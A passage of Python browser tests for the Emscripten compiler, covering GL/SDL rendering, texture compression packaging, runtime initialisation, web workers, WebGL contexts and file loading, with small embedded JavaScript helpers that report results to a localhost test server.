self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'SPLIT_MEMORY=16777216', '-s', 'WASM=0']) # check for uniform4fv slice being valid in split memory
@requires_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
def test_s3tc_crunch(self):
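    # Package .dds textures with the file packager's --crunch option, check that the package is
    # smaller than the raw textures, then rename the originals so the test can only pass by
    # loading the crunched copies from the package.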
try:
print('Crunch is located at ' + CRUNCH)
    except NameError: # CRUNCH is not defined when crunch is not configured
return self.skipTest('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
def test(args):
print(args)
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
open('text.txt', 'w').write('123')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'] + args, stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
test([])
test(['text.txt']) # also package a non-crunch file
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
try:
print('Crunch is located at ' + CRUNCH)
    except NameError: # CRUNCH is not defined when crunch is not configured
return self.skipTest('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
@requires_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types']).communicate()
Settings.ASM_JS = 1
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
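    # Dynamic linking: supp.cpp is built as a SIDE_MODULE (.js or .wasm) and the main program as a
    # MAIN_MODULE that pulls it in via RUNTIME_LINKED_LIBS, for both asm.js and wasm.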
for wasm in [0, 1]:
print(wasm)
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
Popen([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm]).communicate()
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''' % self.test_port)
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
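    # Drive Module.memoryInitializerRequest ourselves from a pre-js: a valid URL for the .mem file
    # lets startup proceed (expected '1'), while a bogus URL triggers the console.warn about
    # memoryInitializerRequest and reports '0'.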
def test(what, status):
print(what, status)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.test_port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
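    # Three JS pieces: post_prep defines ccall/cwrap/direct-call helpers, post_test asserts that
    # using them aborts while the runtime is not ready (unless expected_ok is set), and post_hook
    # reports the value noted by main(). We cover an async mem-init startup (calls land too
    # early), a sync startup where the calls land after exit(), and a build where the runtime
    # stays alive, so all the calls are fine.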
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
        ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.test_port
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=1']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync startup, call too late')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync, runtime still alive, so all good')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
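    # Build the worker side separately with BUILD_AS_WORKER=1 (exporting _one), then run the main
    # program, which drives worker.js.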
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser(): self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
if not has_browser(): self.skipTest('need a browser')
Popen([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
    # We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as its startup directory,
    # and the browser will not close as part of the test, which pins down the cwd on Windows and makes it impossible to delete. Therefore switch away from that directory
    # before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
browser = get_browser()
if browser is not None:
      # If EMSCRIPTEN_BROWSER carried command line arguments to pass to the browser (e.g. "firefox -profile /path/to/foo"), those can't be passed via emrun, so strip them out.
browser_cmd = shlex.split(browser)
browser_path = browser_cmd[0]
args += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
import argparse
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args += ['--browser_args', ' ' + ' '.join(browser_args)]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
  # This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
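    # Regression test: adding and immediately removing a run dependency in preRun must not cause
    # the runtime to start twice (expected result is 1).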
open('pre.js', 'w').write(r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
@requires_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
@requires_hardware
  # Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context on Module.canvas when no ID has been explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_hardware
def test_webgl_context_params(self):
if WINDOWS: self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/kripken/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
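    # Module.locateFile redirects the .mem/.wasm file and the packaged test.data into a 'sub/'
    # directory; tested both via a pre-js and via a shell HTML. In the non-wasm case we also check
    # that the memory init request completed with HTTP status 200.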
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
